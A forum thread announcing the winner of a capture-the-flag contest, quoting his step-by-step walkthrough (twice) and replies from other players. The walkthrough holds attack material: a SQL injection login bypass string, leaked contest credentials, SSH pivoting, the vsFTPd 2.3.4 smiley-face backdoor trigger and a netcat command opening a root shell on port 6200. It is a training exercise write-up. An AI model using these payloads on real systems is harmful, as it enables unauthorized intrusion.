Tortuga has completed the contest! Be sure to congratulate him; this was an extremely challenging contest, and hopefully everyone that participated learned something interesting.

tortuga wrote First, look at the given network map. Go to the web server -- http:/104.236.241.46/ .

Login by exploiting the back-end PHP code via SQL injection by setting both the username and password to ' or ''='.

Now go to the User Filter page, and modify the query parameter in a similar manner --

[ Register or Signin to view external links. ] or ''='

The browser properly encode the quotes and spaces. A list of users is then given. The one that stands out is the third.

Username: cHanAx8S
Password: 44nespu&7mEspUq$

Now open up a terminal, and ssh into the web server using the above credentials.

$ ssh 104.236.241.46 -l cHanAx8S
cHanAx8S44 @ 104.236.241.46's password: 44nespu&7mEspUq$

Where are we?

$ hostname
WizardServer01

And what about our IPs?

$ hostname -I
104.236.241.46 10.17.0.7 10.132.100.194

Okay. What about our routes?

$ route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 104.236.192.1 0.0.0.0 UG 0 0 0 eth0
10.17.0.0 * 255.255.0.0 U 0 0 0 eth0
10.132.99.102 10.132.100.194 255.255.255.255 UGH 0 0 0 eth1
104.236.192.0 * 255.255.192.0 U 0 0 0 eth0

Notice that packets to 10.132.99.102 go through a gateway of 10.132.100.194. Hey look - that gateway is one of our IPs. Interestingly, both are in the VPC's IP range. Since we're already in the first, let's ssh into the other one.

$ ssh 10.132.99.102
cHanAx8S44 @ 10.132.99.102's password: 44nespu&7mEspUq$

Nice. Where are we now?

$ hostname
WizardServer02

What's in our home directory?

$ ls
history.log key.txt

$ cat key.txt
tuSU7etreP4W

$ cat history.log
OPEN 138.197.75.246
PUT ./* /root/
CLOSE

We can't do much with that key right now, so let's think about what the log file is about.

Performing a quick nmap scan of that IP, we'll find that it has an FTP instance running on the default port 21, so let's try that.

$ ftp 138.197.75.246
Connected to 138.197.75.246.
220 (vsFTPd 2.3.4)
Name (138.197.75.246:cHanAx8S):

Note the FTP banner. The FTP server is vsFTP version 2.3.4. There's a popular and crazy! exploit with this version of vsFTP, described briefly in the Wikipedia article here - [ Register or Signin to view external links. ]

The description of the exploit is incomplete though. We can't just issue a smiley face as the username to gain root access on port 6200. The username has to end with a smiley face, with some characters before it. That is, we issue `a` as the username --

$ ftp 138.197.75.246
Connected to 138.197.75.246.
220 (vsFTPd 2.3.4)
Name (138.197.75.246:cHanAx8S): a
331 Please specify the password.
Password:

Enter anything for the password, and the FTP terminal will hang now.

In a new terminal, we can now connect to the FTP server as root via netcat.

Inside of that box, in root's home directory we find a file, string.txt whose contents are --

ENCRYPTED_LAUNCH_CODE:
5z42UV8urhFOibqMLaONi3NR7p6uPyA%2Fp3HHi7WK9xQGkLbbRXD%2Fng%3D%3D

Fantastic, but they're encrypted.
First, look at the given network map. Go to the web server -- http:/104.236.241.46/ .

We now brute force the encryption server to expose any potential entry-points. DirBuster or any other tool will do the job, but DirBuster is pretty nice and comes with great dictionaries already. (Thanks for the screenshots hints btw!).

It finds a 403 for [ Register or Signin to view external links. ] .

Restart the scan to start inside of the /encryption/ directory.

It then finds a 200 for [ Register or Signin to view external links. ] .

We don't want to encrypt, so try [ Register or Signin to view external links. ] .

The warning clues us in and so we try key as a request parameter.

Okay, but we need to give the endpoint our encoded launch code. It's not ENCRYPTED_LAUNCH_CODE, it's not code, it's not data. What was the name of the file? string.txt? string works!

[ Register or Signin to view external links. ]

Mission_complete_keyword: GAMMAENIGMA

I'll leave the environment open for a few days for anyone that is interested in walking through the challenges. If there are any questions, or if the environment needs resetting, feel free to PM me!

I have not a clue what the hell he's talking about lmao as its too advance for me, but just like to say congratulations to you tortuga, you are now a Wizard my friend

+300

TL;DR : Don't make fun of speed when he drops a contest that lasted 3 hours, or else he'll drop something like this.

[ Register or Signin to view external links. ]

not a single thing I understood there but congratulations tortuga!

For completeness' sake, when logging into the FTP server as root, the netcat command is nc 138.197.75.246 6200. For some reason the PM wouldn't go through if I included that specific line in the PM. If netcat isn't installed on your machine, telnet 138.197.75.246 6200 should work too, but it didn't for me.

And thanks so much everyone!

Well congrats, i'm slightly salty. Wanna kms now, was on the last step

speed wrote Tortuga has completed the contest! Be sure to congratulate him; this was an extremely challenging contest, and hopefully everyone that participated learned something interesting.

tortuga wrote First, look at the given network map. Go to the web server -- http:/104.236.241.46/ .

Login by exploiting the back-end PHP code via SQL injection by setting both the username and password to ' or ''='.

Now go to the User Filter page, and modify the query parameter in a similar manner --

[ Register or Signin to view external links. ] or ''='

The browser properly encode the quotes and spaces. A list of users is then given. The one that stands out is the third.

Username: cHanAx8S
Password: 44nespu&7mEspUq$

Now open up a terminal, and ssh into the web server using the above credentials.

$ ssh 104.236.241.46 -l cHanAx8S
cHanAx8S44 @ 104.236.241.46's password: 44nespu&7mEspUq$

Where are we?

$ hostname
WizardServer01

And what about our IPs?

$ hostname -I
104.236.241.46 10.17.0.7 10.132.100.194

Okay. What about our routes?

$ route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 104.236.192.1 0.0.0.0 UG 0 0 0 eth0
10.17.0.0 * 255.255.0.0 U 0 0 0 eth0
10.132.99.102 10.132.100.194 255.255.255.255 UGH 0 0 0 eth1
104.236.192.0 * 255.255.192.0 U 0 0 0 eth0

Notice that packets to 10.132.99.102 go through a gateway of 10.132.100.194. Hey look - that gateway is one of our IPs. Interestingly, both are in the VPC's IP range. Since we're already in the first, let's ssh into the other one.

$ ssh 10.132.99.102
cHanAx8S44 @ 10.132.99.102's password: 44nespu&7mEspUq$

Nice. Where are we now?

$ hostname
WizardServer02

What's in our home directory?

$ ls
history.log key.txt

$ cat key.txt
tuSU7etreP4W

$ cat history.log
OPEN 138.197.75.246
PUT ./* /root/
CLOSE

We can't do much with that key right now, so let's think about what the log file is about.

Performing a quick nmap scan of that IP, we'll find that it has an FTP instance running on the default port 21, so let's try that.

$ ftp 138.197.75.246
Connected to 138.197.75.246.
220 (vsFTPd 2.3.4)
Name (138.197.75.246:cHanAx8S):

Note the FTP banner. The FTP server is vsFTP version 2.3.4. There's a popular and crazy! exploit with this version of vsFTP, described briefly in the Wikipedia article here - [ Register or Signin to view external links. ]

The description of the exploit is incomplete though. We can't just issue a smiley face as the username to gain root access on port 6200. The username has to end with a smiley face, with some characters before it. That is, we issue `a` as the username --

$ ftp 138.197.75.246
Connected to 138.197.75.246.
220 (vsFTPd 2.3.4)
Name (138.197.75.246:cHanAx8S): a
331 Please specify the password.
Password:

Enter anything for the password, and the FTP terminal will hang now.

In a new terminal, we can now connect to the FTP server as root via netcat.

Inside of that box, in root's home directory we find a file, string.txt whose contents are --

ENCRYPTED_LAUNCH_CODE:
5z42UV8urhFOibqMLaONi3NR7p6uPyA%2Fp3HHi7WK9xQGkLbbRXD%2Fng%3D%3D

Fantastic, but they're encrypted.
First, look at the given network map. Go to the web server -- http:/104.236.241.46/ .

We now brute force the encryption server to expose any potential entry-points. DirBuster or any other tool will do the job, but DirBuster is pretty nice and comes with great dictionaries already. (Thanks for the screenshots hints btw!).

It finds a 403 for [ Register or Signin to view external links. ] .

Restart the scan to start inside of the /encryption/ directory.

It then finds a 200 for [ Register or Signin to view external links. ] .

We don't want to encrypt, so try [ Register or Signin to view external links. ] .

The warning clues us in and so we try key as a request parameter.

Okay, but we need to give the endpoint our encoded launch code. It's not ENCRYPTED_LAUNCH_CODE, it's not code, it's not data. What was the name of the file? string.txt? string works!

[ Register or Signin to view external links. ]

Mission_complete_keyword: GAMMAENIGMA

I'll leave the environment open for a few days for anyone that is interested in walking through the challenges. If there are any questions, or if the environment needs resetting, feel free to PM me!

Damn that wizard shit aint no joke this shit got me lost in the sauce

Darn that last clue.
Ain't used dirbuster so I couldn't recognize that last clue. Tried googling the stuff in the image and nothing pointed me at dirbuster.

Crafty you for putting a clue that only those who have used the tool before would understand.

Well, props to Tortuga, then. I'll just be happy with making the fast progress I did before hitting a wall at the last step.

JaredKat wrote Darn that last clue.
Ain't used dirbuster so I couldn't recognize that last clue. Tried googling the stuff in the image and nothing pointed me at dirbuster.

Crafty you for putting a clue that only those who have used the tool before would understand.

Well, props to Tortuga, then. I'll just be happy with making the fast progress I did before hitting a wall at the last step.

I've actually never used it before! Here's my entertaining search history from a couple hours ago lol

[ Register or Signin to view external links. ]

The search terms never matched up well, but the fourth link summary mentioned something about url fuzzing, and having read about that before, I decided to follow the page and give it a quick read

[ Register or Signin to view external links. ]

Reading through the Tech Segment, the dude mentions some tools he likes to use, and he includes a screenshot of DirBuster! Having seen the hint, I decided to use that tool! Pure coincidence!

My original approach was to actually brute-force the request parameters for index.php... because why else would speed post a screen-shot of something sending hundreds of requests per second? Certainly the parameters had to something cryptic! Apparently not! After discovering the path, I feel like brute-forcing wasn't even necessary. Knowing that this was the encryption server, finding a directory of /encryption/ doesn't seem too surprising now lol

tortuga wrote

JaredKat wrote Darn that last clue.
Ain't used dirbuster so I couldn't recognize that last clue. Tried googling the stuff in the image and nothing pointed me at dirbuster.

Crafty you for putting a clue that only those who have used the tool before would understand.

Well, props to Tortuga, then. I'll just be happy with making the fast progress I did before hitting a wall at the last step.

I've actually never used it before! Here's my entertaining search history from a couple hours ago lol

[ Register or Signin to view external links. ]

The search terms never matched up well, but the fourth link summary mentioned something about url fuzzing, and having read about that before, I decided to follow the page and give it a quick read

[ Register or Signin to view external links. ]

Reading through the Tech Segment, the dude mentions some tools he likes to use, and he includes a screenshot of DirBuster! Having seen the hint, I decided to use that tool! Pure coincidence!

My original approach was to actually brute-force the request parameters for index.php... because why else would speed post a screen-shot of something sending hundreds of requests per second? Certainly the parameters had to something cryptic! Apparently not! After discovering the path, I feel like brute-forcing wasn't even necessary. Knowing that this was the encryption server, finding a directory of /encryption/ doesn't seem too surprising now lol

Nice path - a bit more clever than I. Well, good on you, just a little frustrated that something seemingly so simple in hindsight kept me back